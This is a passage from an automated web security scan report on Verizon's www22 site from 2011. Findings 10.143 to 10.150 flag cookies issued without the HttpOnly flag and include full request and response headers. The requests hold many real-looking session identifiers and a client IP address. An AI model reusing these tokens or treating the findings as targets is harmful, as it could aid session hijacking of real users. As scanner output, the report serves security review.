GET /ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*

Response

HTTP/1.0 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
Content-Type: text/html; charset=utf-8
Content-Length: 261
Expires: Mon, 05 Sep 2011 22:25:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:33 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; path=/; secure; HttpOnly

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&amp;CUSTTYPE=NEW&amp;
...[SNIP]...

10.143. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/VerizonGlobalHome/validlogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/VerizonGlobalHome/validlogin.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 638
Cache-Control: private, max-age=1791
Date: Mon, 05 Sep 2011 22:19:46 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:24:46 GMT; path=/content/; domain=verizon.com

var aType=new Array("retailconsumer","retailgeneralbiz","eservices");var aLOB=new Array("myvz","myvzquickpay","concos","rescos","smbcos","retailgenbiz","retailconsumer","callassistant");var ckType='';
...[SNIP]...

10.144. https://www22.verizon.com/includes/cache/15/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/15/blank.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/15/blank.html HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: Fri, 07 May 2010 18:39:58 GMT
Accept-Ranges: bytes
ETag: "e8adcb114eeca1:111b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:04 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com


10.145. https://www22.verizon.com/includes/cache/getwb31.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/getwb31.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/getwb31.asp?zip=10011 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ForgotUserIDPassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 683
Content-Type: text/javascript
Expires: Mon, 05 Sep 2011 22:28:18 GMT
Cache-Control: Private
Date: Mon, 05 Sep 2011 22:23:18 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:28:18 GMT; path=/includes/; domain=verizon.com


rewriteHTML('scbwbnotice','');
rewriteHTML('scbwblinktext','New York,&nbsp;NY&nbsp;10011');
rewriteHTML('scbwbicon','<a href=\'http://weather.weatherbug.com/NY/New York-weather.html?zcode=z6726&zi
...[SNIP]...

10.146. https://www22.verizon.com/includes/javascript/commonjs/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/commonjs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/commonjs/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 18981
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* detect.js */

var agt=navigator.userAgent.toLowerCase();
va
...[SNIP]...

10.147. https://www22.verizon.com/includes/javascript/hbx.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx.js/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:42 GMT
Content-Length: 16426
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com


//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/*
...[SNIP]...

10.148. https://www22.verizon.com/includes/javascript/hbx_custom.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx_custom.js/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx_custom.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 19482
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


if(typeof(ghfT)=='undefined'){var ghfT='noscb';}

function fObj(n,d){
   var p,i,x;if(!d)d=document;if((p=n.indexOf('?'))>0&&parent.frames.length){
   d=parent.frames[n.substring(p+1)].document;n=n.
...[SNIP]...

10.149. https://www22.verizon.com/includes/javascript/sitewise.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/sitewise.js/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/sitewise.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 10531
Date: Mon, 05 Sep 2011 22:21:59 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com


// START OF SDC Advanced Tracking Code
// Copyright (c) 1996-2005 WebTrends Inc. All rights reserved.
// V8.0
// $DateTime: 2006/05/02 08:33:13 $

var gService = true;
var gTimeZone = -6;

...[SNIP]...

10.150. https://www22.verizon.com/vztracker/vzTracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /vztracker/vzTracker.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vztracker/vzTracker.aspx?appName=ECSP_OLH&Type=2|A&requestUrl=javscrit%3AO_LC%28%29%3B&referrer=http%3A//www22.verizon.com/ResidentialHelp/Generic/Ask%2520Verizon/Getting%2520Started/124519.htm&Title=Feedbackfeedbacklink&id=2563991732895.3745 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
